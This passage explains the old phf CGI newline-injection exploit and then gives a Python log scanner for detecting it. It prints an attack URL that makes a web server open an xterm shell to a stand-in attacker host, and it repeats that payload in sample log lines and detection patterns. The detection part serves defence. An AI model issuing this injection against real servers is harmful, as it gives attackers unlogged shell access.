Executing the attack
Now the attacker needs to execute the command '/usr/X11R6/bin/xterm -ut -display evil.attacker's.i.p:0.0' by requesting the following URL:
http://target's.i.p.address/cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20evil.attacker's.i.p:0.0
After the exploit has been executed successfully, the remote web server will simply execute xterm with the -display and -ut options enabled and display it back on the attacker's X server, with the window id of 0 and screen id of 0. The activity will not be logged by the system, as the -ut option was enabled. Voila! The attacker has now gained interactive shell access and total control over the system.
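From the defender's side, the request above leaves a recognizable trace in the web server access log: a URL-encoded newline (%0a) inside a CGI parameter, followed by a -display argument. The Python sketch below is an added example, not part of the original page; the log lines are constructed, use documentation addresses and assume Common Log Format, and the function names are hypothetical. It goes slightly beyond phf by flagging an encoded CR or LF in the query string of any /cgi-bin/ request.

```python
import re
from urllib.parse import urlsplit, unquote

# Common Log Format: client ident user [time] "METHOD URI PROTO" status size
REQUEST_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+)[^"]*" (\d{3})')

# Constructed sample lines (documentation addresses, not real traffic).
SAMPLE_LOG = """\
198.51.100.7 - - [01/Jan/1999:10:00:00 +0000] "GET /cgi-bin/phf?Qalias=x%0a/usr/X11R6/bin/xterm%20-ut%20-display%20198.51.100.7:0.0 HTTP/1.0" 200 120
192.0.2.10 - - [01/Jan/1999:10:00:05 +0000] "GET /cgi-bin/phf?Qalias=jsmith HTTP/1.0" 200 310
192.0.2.11 - - [01/Jan/1999:10:00:09 +0000] "GET /index.html HTTP/1.0" 200 2048
198.51.100.9 - - [01/Jan/1999:10:01:00 +0000] "GET /cgi-bin/search?q=a%0Dls HTTP/1.0" 404 0
"""


def inspect_line(line):
    """Return (client, path, reasons) for a suspicious CGI request, else None."""
    m = REQUEST_RE.match(line)
    if not m:
        return None
    client, _method, uri, _status = m.groups()
    parts = urlsplit(uri)
    if "/cgi-bin/" not in parts.path:
        return None
    # Decode percent-escapes so %0a / %0d become real line terminators.
    query = unquote(parts.query)
    reasons = []
    if "\n" in query or "\r" in query:
        reasons.append("encoded newline in CGI parameter")
    # An X client pointed at a remote display, as in the request on this page.
    if re.search(r"-display\s+\S+:\d+", query):
        reasons.append("X display redirection")
    return (client, parts.path, reasons) if reasons else None


def scan(log_text):
    """Inspect every line and keep only the flagged requests."""
    hits = (inspect_line(line) for line in log_text.splitlines())
    return [h for h in hits if h]


if __name__ == "__main__":
    for client, path, reasons in scan(SAMPLE_LOG):
        print(client, path, "; ".join(reasons))
```

A hit on the -display pattern is also worth correlating with outbound connections from the web server to TCP ports 6000 and up, where X servers listen.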